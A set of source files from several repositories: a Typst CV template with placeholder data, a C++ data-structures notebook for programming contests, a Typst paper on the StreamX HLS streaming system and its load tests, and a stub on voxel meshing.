No new tasks are added to the Sprint. Work therefore continues with the activities planned in the retrospective. In particular, the goal is to complete the MVP by implementing the missing features:
- the ability to move within the environment via the keyboard while dragging a product;
- placement of a product from the unplaced-products list into an empty bin.
= Closing note
Given the demonstrative nature of the external meeting and the approaching conclusion of the educational project, no further discussion arose. Every member of the team is aware of the work to be done and the goals to be achieved, in accordance with what was established and planned for the current Sprint. |
|
https://github.com/ice-kylin/typst-cv-miku | https://raw.githubusercontent.com/ice-kylin/typst-cv-miku/main/data.typ | typst | Do What The F*ck You Want To Public License | #import "template.typ": *
#let name = "<NAME>"
#let namezh = "中野三玖"
#let email = [
#icon("email.svg") <EMAIL>
]
#let phone = [
#icon("phone.svg")
(+81) 0906914373641
]
#let home = [
#icon("home.svg")
#link("https://miku.example.com")[ miku.example.com ]
]
#let github = [
#icon("github.svg")
#link("https://miku.example.com")[ miku ]
]
#let linkin = [
#icon("linkedin.svg")
#link("https://miku.example.com")[ <NAME> ]
]
#let author = (
name: name,
email: email,
phone: phone,
home: home,
github: github,
linkin: linkin,
)
#let authorzh = (
name: namezh,
email: email,
phone: phone,
home: home,
github: github,
linkin: linkin,
)
#let selftitle = [ Self Introduction ]
#let selftitlezh = [ 自我总结 ]
#let self = [
#lorem(64)
]
#let selfzh = [
管怀馈犬筹鞘旺增半挂剪吹。励川锂撮菌爷钵梁讽途连和枚反?醛佛奋。篇演靶店寺济枪蔗艇胆历昂遗沾,纲锌妈窖腾奠昆捞经羞幕获豌厚她垅妈轲析夯舰墩璃损傍苷兹仑盒面哪核温藏给录伟助晰言航贸轲洼涉姿妇踪孕。瞎列疾俱寿幅虾夕长坐珠助夏踏蛾阮纸浙恢层融噪拿辐拢厦升体曹呢局?
]
#let edutitle = [ Education ]
#let edutitlezh = [ 教育经历 ]
#let edu = [
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
Tokyo, Japan \
202x - _present_
]
)
#lorem(32)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
Aichi, Japan \
201x - 201x
]
)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
Aichi, Japan \
201x - 201x
]
)
]
#let eduzh = [
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
东京, 日本 \
202x - _现在_
]
)
#lorem(32)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
爱知, 日本 \
201x - 201x
]
)
#datedsubsection(
align(left)[
*#lorem(4)* \
#lorem(4)
],
align(right)[
爱知, 日本 \
201x - 201x
]
)
]
#let techtitle = [ Technical Skills ]
#let techtitlezh = [ 技术能力 ]
#let tech = [
- *Programming*: #lorem(8)
- #lorem(8)
- #lorem(8)
- *Key words*: #lorem(8)
- *Tools*: #lorem(8)
- #lorem(8)
- #lorem(8)
]
#let techzh = [
- *编程语言*: #lorem(8)
- #lorem(8)
- #lorem(8)
- *关键字*: #lorem(8)
- *工具*: #lorem(8)
- #lorem(8)
- #lorem(8)
]
#let projecttitle = [ Project Experience ]
#let projecttitlezh = [ 项目经历 ]
#let projectexperience = [
#datedsubsection(
align(left)[
*#lorem(4)* \
Maintainer
],
align(right)[
202x - _present_
]
)
- #lorem(32)
- #lorem(8)
#datedsubsection(
align(left)[
*#lorem(4)* \
Maintainer
],
align(right)[
202x - _present_
]
)
- #lorem(32)
- #lorem(8)
]
#let projectexperiencezh = [
#datedsubsection(
align(left)[
*#lorem(4)* \
维护者
],
align(right)[
202x - _现在_
]
)
- #lorem(32)
- #lorem(8)
#datedsubsection(
align(left)[
*#lorem(4)* \
维护者
],
align(right)[
202x - _现在_
]
)
- #lorem(32)
- #lorem(8)
]
#let activitytitle = [ Activity Experience ]
#let activitytitlezh = [ 活动经历 ]
#let activity = [
#datedsubsection(
align(left)[
*#lorem(8)* \
#lorem(4)
],
align(right)[
202x
]
)
#lorem(32)
#datedsubsection(
align(left)[
*#lorem(8) *\
#lorem(4)
],
align(right)[
202x - _present_
]
)
#lorem(16)
#datedsubsection(
align(left)[
*#lorem(8)* \
#lorem(4)
],
align(right)[
202x
]
)
- #lorem(8)
- #lorem(8)
]
#let activityzh = activity
#let hobbiestitle = [ Hobbies and Interests ]
#let hobbiestitlezh = [ 兴趣爱好 ]
#let hobbies = [
#lorem(32)
- *#lorem(4)*: #lorem(4)
- *#lorem(4)*: #lorem(8)
]
#let hobbieszh = hobbies
|
https://github.com/KrisjanisP/lu-icpc-notebook | https://raw.githubusercontent.com/KrisjanisP/lu-icpc-notebook/main/4-structures.typ | typst | = Data structures
#block(breakable:false,[
== Treap
```cpp
struct Node{
int value, cnt, pri; Node *left, *right;
Node(int p) : value(p), cnt(1), pri(gen()),
left(NULL), right(NULL) {};
};
typedef Node* pnode;
int get(pnode q){if(!q) return 0; return q->cnt;}
void update_cnt(pnode &q){
if(!q) return; q->cnt=get(q->left)+get(q->right)+1;
}
void merge(pnode &T, pnode lef, pnode rig){
if(!lef){T=rig;return;} if(!rig){T=lef;return;}
if(lef->pri>rig->pri){merge(lef->right,lef->right,rig);T=lef;
}else{merge(rig->left, lef, rig->left); T = rig;}
update_cnt(T);
}
void split(pnode cur, pnode &lef, pnode &rig, int key){
if(!cur){lef=rig=NULL;return;} int id=get(cur->left)+1;
if(id<=key){split(cur->right,cur->right,rig,key-id);lef=cur;}
else {split(cur->left, lef, cur->left, key); rig = cur;}
update_cnt(cur);
}
```
])
#block(breakable:false,[
== Lazy segment tree
```cpp
struct SumSegmentTree{
vector<ll> S, O, L; // S: segment tree, O: original, L: lazy
void build(ll ti, ll tl, ll tr){
if(tl==tr){S[ti]=O[tl]; return;}
build(ti*2,tl,(tl+tr)/2);build((ti*2)+1,(tl+tr)/2+1,tr);
S[ti]=S[ti*2]+S[(ti*2)+1];
}
void push(ll ti, ll tl, ll tr){
S[ti] += L[ti]*(tr-tl+1); if(tl==tr){L[ti]=0;return;}
L[ti+ti] += L[ti],L[ti+ti+1] += L[ti]; L[ti] = 0;
}
ll query(ll ti, ll tl, ll tr, ll i, ll j){
push(ti, tl, tr);
if(i<=tl&&tr<=j) return S[ti]; if(tr<i||tl>j) return 0;
ll a = query(ti*2, tl, (tl+tr)/2, i, j);
ll b = query((ti*2)+1, ((tl+tr)/2)+1,tr, i, j);
return a+b;
}
void update(ll ti, ll tl, ll tr, ll i, ll j, ll v){
if(i<=tl&&tr<=j){L[ti]+=v;return;}
    if(tr<i||tl>j) return; S[ti]+=v*(min(tr,j)-max(tl,i)+1);
update(ti*2,tl,(tl+tr)/2,i,j,v);
update((ti*2)+1,(tl+tr)/2+1,tr,i,j,v);
};
  SumSegmentTree(vector<ll> &V){
O = V; S.resize(O.size()*4, 0); L.resize(O.size()*4, 0);
build(1, 0, O.size()-1);
}
};
```
])
#block(breakable:false,[
== Sparse table
```cpp
const int N = 100000, M = 17; // M >= log2(N)
int n, v[N], sparse[N][M];
void build() {
for(int i = 0; i < n; i++) sparse[i][0] = v[i];
for(int j = 1; j < M; j++) for(int i = 0; i < n; i++)
sparse[i][j] = i + (1 << j - 1) < n
? min(sparse[i][j - 1], sparse[i + (1 << j - 1)][j - 1])
: sparse[i][j - 1];
}
int query(int a, int b){
int pot = 32 - __builtin_clz(b - a) - 1;
return min(sparse[a][pot], sparse[b - (1 << pot) + 1][pot]);
}
```
])
#block( breakable: false,[
== Fenwick tree
```cpp
struct FenwickTree {
int n;vector<ll> bit; // binary indexed tree
FenwickTree(int n) {this->n=n;bit.assign(n, 0);}
ll sum(int r) {
ll ret=0;
for(;r>=0;r=(r&(r+1))-1) ret+=bit[r];
return ret;
}
ll sum(int l, int r){return sum(r)-sum(l-1);}
void add(int idx, ll delta){
for(;idx<n;idx=idx|(idx+1))bit[idx]+=delta;
}
};
```
])
#block( breakable: false,[
== Trie
```cpp
const int K = 26;
struct Vertex {
int next[K];
bool output = false;
Vertex() {fill(begin(next), end(next), -1);}
};
vector<Vertex> t(1); // trie nodes
void add_string(string const& s) {
int v = 0;
for (char ch : s) {
int c = ch - 'a';
if (t[v].next[c] == -1) {
t[v].next[c] = t.size();
t.emplace_back();
}
v = t[v].next[c];
}
t[v].output = true;
}
```
])
#block( breakable: false,[
== Aho-Corasick
```cpp
const int K = 26;
struct V {
int n[K], go[K], p = -1; // next, go transitions, parent
char ch; // char from parent to this node
bool out = false; // is end of a pattern
int l = -1, d = -1, e = -1; // fail link, depth, exit length
V(int parent = -1, char c = '$') : p(parent), ch(c) {
fill(n, n + K, -1); // initialize transitions
fill(go, go + K, -1); // initialize go transitions
}
};
vector<V> t(1);
void add_string(const string& s){ // Add a string to the trie
int v = 0;
for(char c : s){
int ci = c - 'a';
if(t[v].n[ci] == -1){
t[v].n[ci] = t.size();
t.emplace_back(v, c); // create new node
}
v = t[v].n[ci];
}
t[v].out = true; // mark end of pattern
}
int go_func(int v, char c);
int get_link(int v){ // Get the fail link for node v
if(t[v].l == -1){
if(v == 0 || t[v].p == 0) t[v].l = 0;
else t[v].l = go_func(get_link(t[v].p), t[v].ch);
} return t[v].l;
}
// Compute the transition for node v with character c
int go_func(int v, char c){
int ci = c - 'a';
if(t[v].go[ci] == -1){
if(t[v].n[ci] != -1) t[v].go[ci] = t[v].n[ci];
else t[v].go[ci] = (v==0) ? 0 : go_func(get_link(v),c);
}
return t[v].go[ci];
}
```
])
#block( breakable: false,[
== Disjoint Set Union
```cpp
struct DSU {
vector<int> p, r; // p: parent, r: rank
DSU(int n) {
p.resize(n); r.resize(n);
for (int i = 0; i < n; i++) p[i] = i;
}
int f(int a){if (p[a] == a) return a; return p[a] = f(p[a]);}
void unite(int a, int b) {
a = f(a), b = f(b); if (a == b) return;
if (r[a] < r[b]) p[a] = b; else if (r[a] > r[b]) p[b] = a;
else {p[b] = a; r[a]++;}
}
};
```
])
#block( breakable: false,[
== Merge sort tree
```cpp
struct MergeSortTree{
int size; vector<vector<ll>> values;
void init(int n){
size=1; while(size<n) size*=2;
values.resize(size*2, vector<ll>());
}
void build(vector<ll> &arr, int x, int lx, int rx){
if(rx-lx==1){
if(lx<arr.size()) values[x].push_back(arr[lx]);
else values[x].push_back(-1);
return;
}
int m=(lx+rx)/2;
build(arr,2*x+1,lx,m);
build(arr,2*x+2,m,rx);
int i=0, j=0, asize=values[2*x+1].size();
while(i<asize && j<values[2*x+2].size()){
if(values[2*x+1][i]<values[2*x+2][j])
values[x].push_back(values[2*x+1][i++]);
else values[x].push_back(values[2*x+2][j++]);
}
while(i<asize)
values[x].push_back(values[2*x+1][i++]);
while(j<values[2*x+2].size())
values[x].push_back(values[2*x+2][j++]);
}
void build(vector<ll> &arr){ build(arr,0,0,size); }
int calc(int l, int r, int x, int lx, int rx, int k){
if(lx>=r || rx<=l) return 0;
if(lx>=l && rx<=r){
int lft=-1, rght=values[x].size();
while(rght-lft>1){
int mid=(lft+rght)/2;
if(values[x][mid]<k) lft=mid;
else rght=mid;
}
return lft+1;
}
int m=(lx+rx)/2;
return calc(l,r,2*x+1,lx,m,k) + calc(l,r,2*x+2,m,rx,k);
}
int calc(int l, int r, int k){ return calc(l,r,0,0,size,k); }
};
```
])
#block(breakable: false, [
== janY mass operations segment tree
```cpp
struct item { ll x; item(ll x=0) : x(x) {} };
struct segtree {
int size; vector<item> values, ops;
item NEUTRAL=0, DEFAULT=0, NOOP=0;
item modify_op(item a, item b, ll len) {
a.x += b.x*len; return a; }
void apply_mod_op(item &a, item b, ll len) {
a = modify_op(a, b, len); }
item calc_op(item a, item b) { return item(a.x + b.x); }
void init(int n) {
size=1; while(size<n) size<<=1;
values.assign(size<<1, DEFAULT);
ops.assign(size<<1, NOOP);
}
void build(vector<item> &arr, int x=0, int lx=0, int rx=-1) {
if(rx==-1) rx = size;
if(rx - lx ==1) {
values[x] =
(lx < arr.size()) ? arr[lx] : NEUTRAL; return;
}
int m=(lx+rx)/2;
build(arr,2*x+1,lx,m);
build(arr,2*x+2,m,rx);
values[x] = calc_op(values[2*x+1], values[2*x+2]);
}
void propagate(int x, int lx, int rx) {
if(rx - lx ==1) return;
int m=(lx+rx)/2;
apply_mod_op(ops[2*x+1], ops[x],1);
apply_mod_op(values[2*x+1], ops[x],m-lx);
apply_mod_op(ops[2*x+2], ops[x],1);
apply_mod_op(values[2*x+2], ops[x],rx-m);
ops[x] = NOOP;
}
void set(int l, int r, ll v, int x=0, int lx=0, int rx=-1) {
if(rx==-1) rx = size; propagate(x, lx, rx);
if(lx >= r || rx <= l) return;
if(lx >= l && rx <= r) {
apply_mod_op(ops[x], item(v),1);
apply_mod_op(values[x], item(v), rx-lx); return;
}
int m=(lx+rx)/2;
set(l,r,v,2*x+1,lx,m); set(l,r,v,2*x+2,m,rx);
values[x] = calc_op(values[2*x+1], values[2*x+2]);
}
item calc(int l, int r, int x=0, int lx=0, int rx=-1) {
if(rx==-1) rx = size; propagate(x, lx, rx);
if(lx >= r || rx <= l) return NEUTRAL;
if(lx >= l && rx <= r) return values[x];
int m=(lx+rx)/2;
return
calc_op(calc(l,r,2*x+1,lx,m), calc(l,r,2*x+2,m,rx));
}
};
```
])
#block( breakable: false,[
== janY fenwick tree range update
```cpp
struct fenwick { // range update
ll *bit1, *bit2; int fsize;
void init(int n){
fsize=n; bit1=new ll[n+1](); bit2=new ll[n+1]();
}
ll getSum(ll BIT[], int i){
ll s=0; i++; while(i>0){ s += BIT[i]; i -= i & -i; }
return s;
}
void updateBIT(ll BIT[], int i, ll v){
i++; while(i <= fsize){ BIT[i] += v; i += i & -i; }
}
ll sum(int x){
return getSum(bit1,x)*x - getSum(bit2,x);
}
void add(int l, int r, ll v){
updateBIT(bit1,l,v); updateBIT(bit1,r+1,-v);
updateBIT(bit2,l,v*(l-1)); updateBIT(bit2,r+1,-v*r);
}
ll calc(int l, int r){
return sum(r) - sum(l-1);
}
};
```
])
#block( breakable: false,[
== Persistent segment tree
```cpp
#define V struct Vertex
struct Vertex { V *l, *r; ll sum;
Vertex(ll val){l=r=nullptr; sum=val;}
Vertex(V* le, V* ri){l=le;r=ri;sum=(l?l->sum:0)+(r?r->sum:0);}
};
int siz;
vector<V*> start_nodes;
V* build(int lx, int rx, vl &a){
if (lx == rx-1) return new V(a[lx]);
return new V(build(lx,(lx+rx)/2,a),build((lx+rx)/2,rx,a));
}
V* build(vl &a){ siz = a.size(); return build(0, siz, a); }
ll calc(V* v, int lx, int rx, int l, int r){
if(lx >= r || rx <= l) return 0;
if(lx >= l && rx <= r) return v->sum;
int m = (lx + rx) / 2;
return calc(v->l, lx, m, l, r) + calc(v->r, m, rx, l, r);
}
ll calc(V* v, int l, int r){
if (l>r) return 0;
return calc(v,0,siz,l,r);
}
V* upd(V* v, int lx, int rx, int i, ll val){
if(lx == rx-1) return new V(val);
int m = (lx + rx) / 2;
if (i < m) return new V(upd(v->l, lx, m, i, val), v->r);
else return new V(v->l, upd(v->r, m, rx, i, val));
}
V* upd(V* v, int i, ll val){ return upd(v, 0, siz, i, val); }
```
])
|
|
https://github.com/zSnails/StreamX | https://raw.githubusercontent.com/zSnails/StreamX/master/paper/doc.typ | typst | #import "template.typ": ieee_conference as ieee
// #import "@preview/charged-ieee:0.1.2": ieee
#let keywords = (
"HTTP Live Streaming (HLS)",
"StreamX",
"Multimedia content delivery",
"Scalability",
"Load balancing",
"PostgreSQL blob storage",
"Network performance",
"Real-time streaming"
)
#let title = [StreamX: Streaming Over HLS]
#set document(author: ("<NAME>", "<NAME>"), keywords: keywords, date: datetime.today(), title: title)
#set heading(bookmarked: true)
#show: ieee.with(
title: title,
abstract: [
The StreamX system is designed to handle large volumes of simultaneous
requests for multimedia content delivery using the HTTP Live Streaming
(HLS) protocol. The architecture is based on a scalable structure that
includes a load balancer, a Go server, and blob storage in PostgreSQL.
The system allows users to stream video and audio without downloading
entire files, offering a real-time experience similar to platforms like
Netflix. Performance tests under adverse network conditions, such as
packet loss and limited bandwidth, demonstrated the system's adaptive
behavior, stabilizing over time despite initial spikes in blocked or
failed requests. In optimal network environments, the system operates
without failures, confirming its efficiency in handling multimedia
content delivery.
],
authors: (
(
name: "<NAME>",
department: [Developer],
organization: [ITCR],
location: [Santa Clara, San Carlos],
email: "<EMAIL>"
),
(
name: "<NAME>",
department: [Developer],
organization: [ITCR],
location: [Santa Clara, San Carlos],
email: "<EMAIL>"
),
),
index-terms: keywords,
bibliography-file: "refs.bib",
//bibliography: bibliography("refs.bib")
)
#set text(lang: "en")
= Architectural Design
#set smartquote(alternative: true)
#figure(image("./diagramv2.svg"),
caption: [
System's Architectural Design
]
)
The architectural design of StreamX is based on a scalable, efficient
infrastructure for delivering multimedia content through the HTTP Live
Streaming (HLS) protocol @pantos2017http. The system is composed of several
distributed components that cooperate to ensure a fast, smooth user
experience capable of handling multiple simultaneous requests.
The StreamX frontend consists of a user interface that can be accessed
through web browsers on desktop platforms. This interface lets users browse
the multimedia catalog, such as videos and music, and submit playback
requests. Interactions between users and the system take place through HTTP
requests, which initiate the content delivery process.
On the backend, Nginx @soni2016nginx plays a crucial role as load balancer
and reverse proxy. Its job is to receive users' HTTP requests and distribute
them efficiently among the different instances of the backend server
implemented in Go. This load balancing lets the system handle large volumes
of traffic without overloading any single instance, ensuring the platform's
high availability and scalability.
The Go server @tsoukalos2019mastering is the core of the backend and manages
all of the system's business logic. When a request is forwarded from Nginx,
the Go server processes it, which includes authenticating the user and
validating the request. From that point, the Go server queries the
PostgreSQL database @douglas2003postgresql, which acts as the primary
storage system for the multimedia files and their related metadata.
PostgreSQL stores the videos and songs as blobs@blob @shapiro1999managing,
allowing efficient access to large volumes of data, while metadata such as
titles, authors, and duration is managed through SQL queries.
#footnote("Binary Large Object") <blob>
Once the Go server retrieves the media content from PostgreSQL, it uses the
HLS protocol to split the files into small fragments, which are delivered to
the client incrementally. This lets users start playing the content without
downloading the whole file, which improves the real-time streaming experience.
The video or audio fragments are sent to the user through Nginx, which manages
the connection between the server and the end client.
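StreamX's actual segmenter is not shown in this report. As a simplified sketch
of the idea, the following Go function cuts a payload into fixed-size
fragments; real HLS cuts by playback duration and also publishes an `.m3u8`
playlist listing the segments, so this is only an approximation:

```go
package main

import "fmt"

// segment splits a media payload into fixed-size chunks, a simplified
// stand-in for HLS segmentation: the client can begin fetching and
// playing early chunks before the rest of the file is transferred.
func segment(data []byte, size int) [][]byte {
	var segs [][]byte
	for len(data) > 0 {
		n := size
		if len(data) < n {
			n = len(data)
		}
		segs = append(segs, data[:n])
		data = data[n:]
	}
	return segs
}

func main() {
	media := make([]byte, 10) // pretend this is a video blob from PostgreSQL
	fmt.Println(len(segment(media, 4))) // 3 segments: 4 + 4 + 2 bytes
}
```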
The complete flow begins with a playback request from the user, which is
received by Nginx and forwarded to the Go server. The server processes the
request, fetches the required data from PostgreSQL, and then delivers the HLS
fragments back to the user for playback. This process ensures a smooth,
high-quality experience similar to that offered by services such as Netflix or
Spotify.
// #image("../diagrams/diagram.svg")
// #image("../diagrams/components.svg")
= Performance Report
The data presented in this section does not represent absolute metrics for a
single connection. Instead, it is an aggregate of the averages of the data
collected from the 10 virtual users employed in the performance tests. Each
chart reflects the average behavior of these multiple simultaneous
connections, which gives a more general view of the system's performance under
representative load conditions.
== A User Uploading a Video
The tests for a user uploading a video were simulated with `k6`, using a total
of 10 virtual users over a period of 10 seconds.
=== Blocked HTTP Requests
==== 20% Packet Loss
#figure(caption: [HTTP Requests Blocked Over Time \@ 20% Packet Loss], image("./k6/user-uploading-video-20p-packet-loss-http_req_blocked_plot.svg")) <fig1>
The chart in Fig. @fig1 shows the metrics for blocked HTTP requests over time
under a network configuration with 20% packet loss. The X axis represents
time, while the Y axis shows the number of blocked requests. Several key
aspects of the system's behavior under these adverse network conditions can be
drawn from it.

In the initial phase of the observation period there is a rapid rise in the
number of blocked requests, peaking near 1.0 on the Y axis. This initial spike
suggests that, at the start of the test, a large number of HTTP requests were
blocked, most likely because packet loss prevented requests from reaching the
server properly. This behavior is typical of lossy networks, especially at the
beginning of a load test, when the system has not yet adjusted its mechanisms
to compensate for the loss.

The chart then shows an abrupt drop in blocked requests, falling almost to 0
within a short time. This rapid drop suggests the system momentarily recovered
or adapted to the network conditions, drastically reducing the number of
blocked requests. Several factors could explain this response, such as
automatic recovery mechanisms, retransmission of blocked requests, or internal
adjustments that temporarily improve request processing despite the packet
loss.

After this initial recovery, the blocked-request metric stabilizes, with small
fluctuations that remain around low values, roughly between 0.1 and 0.2. This
indicates that although the system manages to stabilize, it has not reached a
fully optimal state: the small variations suggest it is still coping with the
adverse network conditions, though to a lesser degree than at the start of the
period.
==== 500 kbit/s Bandwidth
#figure(caption: [HTTP Requests Blocked Over Time \@ 500kbits bandwidth], image("./k6/user-uploading-video-500kbit-http_req_blocked_plot.svg")) <fig2>
The chart in Fig. @fig2 shows the number of blocked HTTP requests over time
under a network condition with bandwidth limited to 500 kbit/s. This scenario
simulates a low-bandwidth network, which directly affects request performance.
The X axis shows time, while the Y axis shows the number of blocked HTTP
requests. The chart reveals interesting behavior under these conditions.

Initially, the chart shows a high number of blocked requests, close to 0.5,
indicating that at the start of the test the bandwidth-limited network results
in heavy blocking. This is to be expected, since the low transmission rate
restricts the system's ability to process requests effectively in the first
moments of the test.

After this initial peak, the number of blocked requests decreases gradually,
reaching a lower value close to 0.1. This decline reflects the system
adjusting to the bandwidth limits, possibly by adapting its flow-control
mechanisms or retransmission policies. Despite this improvement, the system
does not reach full stability, as shown by the fluctuations in the later data.

The chart shows an oscillating pattern in blocked requests after the initial
drop, with values varying between 0.1 and 0.2 at different points. This
indicates the system continues to struggle to handle request traffic under
restricted bandwidth, though less severely than at the start of the test. The
fluctuations suggest that, while some level of adaptation is achieved, the
system cannot completely eliminate blocking given the scarce network
resources.
==== Optimal Network Configuration
#figure(caption: [HTTP Requests Blocked Over Time \@ Optimal Settings], image("./k6/uploading-video-http_req_blocked_plot.svg")) <fig3>
The chart in Fig. @fig3, which illustrates the number of blocked HTTP requests
under an optimal network configuration, highlights several important aspects
of the system's behavior. Unlike the earlier scenarios with network
constraints, this chart reflects the server's performance in an environment
without significant restrictions. Even so, the results revealed that the
server's configuration parameters were not adequate for the system's demands,
particularly regarding the rate-limit mechanism we implemented.

From the start of the test there is a peak in blocked requests, reaching 0.6.
Despite the rapid decrease that follows, with blocked requests falling below
0.2, minor fluctuations persist over time. These oscillations, moving between
0.1 and 0.3 at different points, suggest the system still blocks requests even
under ideal network conditions.

On reviewing the server configuration, we noticed we had implemented a
rate-limit mechanism to control request traffic. It was configured to cap the
number of requests that can be processed within a given time window, with the
goal of preventing server overload. The tests, however, revealed that the
rate-limit parameters were not optimal for the real demand involved in serving
even a single video under high load.

The limit initially configured turned out to be too low for the streaming
system's requirements. As a result, even in an environment with optimal
network conditions, requests were blocked that the server could have handled
had the limit been higher. These tests showed us the need to tune the
rate-limit parameters so the system can process a larger volume of requests
without unnecessary blocking, especially when serving several simultaneous
users accessing the media content.
=== Data Sent
==== 500 kbit/s Bandwidth
#figure(caption: [Data Sent Over Time \@ 500kbits bandwidth], image("k6/user-uploading-video-500kbit-data_sent_plot.svg")) <fig4>
The chart in Fig. @fig4 shows the amount of data sent while uploading a video
under a 500 kbit/s bandwidth restriction. The X axis represents time, while
the Y axis shows the amount of data sent, with totals in the range of $10^7$
bytes.

The system's behavior under this restriction reveals several important
patterns in how the server manages data transmission when bandwidth is
limited.

At the start of the chart, the amount of data sent begins near
$3.5 times 10^7$ bytes and grows quickly, peaking at roughly
$7.5 times 10^7$ bytes around the middle of the observed period. This shows
that, despite the bandwidth limits, the system can keep a relatively steady
upload rate during the early part of the video upload.

After this peak, however, the chart shows a series of fluctuations, with dips
and spikes in the amount of data sent over time. These oscillations indicate
the system cannot sustain a constant data flow because of the bandwidth
restriction. In the moments where the amount of data sent drops, the limited
bandwidth is likely impairing the server's ability to keep transmitting
steadily.

These fluctuations may be related to how the server's flow-control mechanism
interacts with the bandwidth cap. The server tries to send as much data as
possible whenever the network allows, but the cap keeps this rate from being
uniform, producing moments where the upload speed drops significantly.
==== 20% Packet Loss
#figure(caption: [Data Sent Over Time \@ 20% Packet Loss], image("k6/user-uploading-video-20p-packet-loss-data_sent_plot.svg")) <fig5>
The chart we provide in Fig. @fig5 shows the system's behavior in terms of
data sent during a video upload, this time under a network condition with 20%
packet loss. Unlike the previous chart, which was limited to 500 kbit/s of
bandwidth, here the impact on transmission comes from packet loss rather than
reduced bandwidth.

The X axis represents time, while the Y axis shows the amount of data sent,
with values in the range of $10^7$ bytes.

At the start of the chart there is relatively steady growth in the amount of
data sent, from $4.5 times 10^7$ bytes up to a maximum near
$7.5 times 10^7$ bytes. This trend indicates that even with packet loss, the
server can send data efficiently during the early moments of the transfer.
The packet loss begins to affect performance later on.

A key difference from the previous chart is that, although the amount of data
sent trends upward, the peaks and dips in transmitted volume are more
pronounced. After reaching a maximum around $7.5 times 10^7$ bytes, the chart
shows a visible drop followed by a partial recovery. This fluctuation reflects
how packet loss interrupts transmission, forcing the server to retransmit or
adjust to compensate for data that did not reach its destination correctly.

Despite these interruptions, the system recovers its sending rate at several
points, which indicates that although 20% packet loss affects the data flow,
the server has mechanisms that partially mitigate the effect. Nevertheless,
the fluctuations over time are evident and show that packet loss has a more
dynamic impact than limited bandwidth, producing sudden drops in the amount of
data sent.
==== Optimal Network Configuration
#figure(caption: [Data Sent Over Time \@ Optimal Settings], image("./k6/uploading-video-data_sent_plot.svg")) <fig6>
The chart presented in Fig. @fig6 shows the amount of data sent during a video
upload under an optimal network configuration, that is, without significant
restrictions such as packet loss or bandwidth caps. The X axis represents
time, while the Y axis shows the amount of data sent, with values in the range
of $10^7$ bytes.

The behavior observed in this configuration reflects a smooth and relatively
stable data flow. From the start, the amount of data sent grows continuously,
beginning at $4.5 times 10^7$ bytes and rising progressively toward
$7.5 times 10^7$ bytes. Over time the chart shows several peaks and dips, but
the fluctuations are mild and do not significantly interrupt the flow.

The system appears to operate efficiently: the observed dips are not
pronounced and do not materially affect performance. Despite some oscillation,
the overall data flow is sustained, indicating the server is handling the
transmission of large data volumes without evident interruptions. The peaks
toward the end of the chart show the system continuing to send data at a
consistently high rate, indicative of a healthy network environment.
=== Failed HTTP Requests
==== 20% Packet Loss
#figure(caption: [Failed HTTP Requests Over Time \@ 20% Packet Loss], image("k6/user-uploading-video-20p-packet-loss-http_req_failed_plot.svg")) <fig7>
The chart in Fig. @fig7 shows how failed connections evolve over time in an
environment with a 20% packet-loss restriction. The X axis shows time, while
the Y axis represents the values of HTTP requests that failed. The trend shows
how the system behaves under adverse network conditions with a high
packet-loss rate.

Initially there is a peak close to 1.0, indicating that at the start of the
test period most requests were failing. This is typical at the beginning of a
high-loss network scenario, where many requests cannot complete successfully
because of network instability.

As time goes on, there is a downward trend in failed requests. The chart shows
a series of successive drops, with some small recovery spikes in between, but
overall the number of failing requests decreases progressively. This reduction
may be related to the system's ability to adapt and manage retransmission of
lost packets, or because some connections manage to complete despite the loss,
improving the results over time.

In the final phases of the chart the values fall below 0.5, meaning that fewer
than 50% of requests are failing by the end of the test. While this
improvement is notable, it still reflects a severely constrained network,
since 20% packet loss continues to hurt the system's efficiency.
==== 500 kbit/s Bandwidth
#figure(caption: [Failed HTTP Requests Over Time \@ 500kbits bandwidth], image("./k6/uploading-video-http_req_failed_plot.svg")) <fig8>
The chart in Fig. @fig8 reflects the number of failed HTTP requests over time
in an environment where the constraint is bandwidth limited to 500 kbit/s.
The X axis represents time, while the Y axis shows the value of failed
requests.

At the start of the chart there is a high value close to 0.9, indicating that
early in the test a large share of requests failed because of the bandwidth
restriction. This high failure rate is typical in scenarios where the server's
capacity to process and send data is too limited to meet demand.

As the test progresses, the chart shows a significant drop in failed requests,
down to about 0.5. After this initial improvement, however, the system appears
to settle into fluctuations between 0.5 and 0.7. These fluctuations indicate
that although the initial failures have decreased, the limited bandwidth still
hurts performance, and a considerable share of requests keeps failing.

Near the end of the chart there is a sharp drop in failed requests, down to
0.2. This suggests that, over time, the system may have adjusted its request
handling or reduced the network load, allowing more requests to succeed
despite the bandwidth limits.
==== Optimal Network Configuration
#figure(
  caption: [Failed HTTP Requests Over Time \@ Optimal Settings],
image("./k6/user-uploading-video-no-constraints-http_req_failed_plot.svg")
) <fig9>
The chart in Fig. @fig9 shows the number of failed HTTP requests over time in
an environment with an optimal network configuration, that is, without
significant restrictions such as bandwidth limits or packet loss. The X axis
represents time, while the Y axis shows the value of failed requests.

In this chart, the values stay consistently at 0 throughout the entire
analyzed period. This means no failed HTTP requests were recorded under this
network configuration, which is indicative of a fully stable network
environment capable of handling the traffic demand without any request
failures.

The total absence of failed HTTP requests on an optimal network shows the
system can manage connections efficiently when no external constraints, such
as limited bandwidth or packet loss, are imposed. This demonstrates the system
is well tuned to operate under ideal conditions, guaranteeing that every
request reaches its destination without interruption.
= Conclusions
The StreamX system is designed to handle large volumes of simultaneous
requests and deliver multimedia content efficiently using the HLS protocol.
The architecture rests on a scalable structure with a load balancer, a server
implemented in Go, and blob storage in PostgreSQL. The system lets users play
videos without downloading them completely, providing a real-time experience
similar to platforms like Netflix.

Regarding performance, the tests under adverse network conditions, such as
packet loss and bandwidth limits, revealed adaptive behavior. Despite the
initial spikes of blocked or failed requests, the system managed to stabilize,
although it did not reach fully optimal performance under those conditions. In
an ideal environment the system showed no request failures, confirming that
StreamX operates efficiently when there are no significant network
constraints.
https://github.com/Caellian/UNIRI_voxels_doc | https://raw.githubusercontent.com/Caellian/UNIRI_voxels_doc/trunk/content/realno_vrijeme.typ | typst | = Prikaz u realnom vremenu
- https://0fps.net/2012/06/30/meshing-in-a-minecraft-game/
- https://www.reddit.com/r/VoxelGameDev/comments/j89l6j/texturing_with_greedy_meshing/
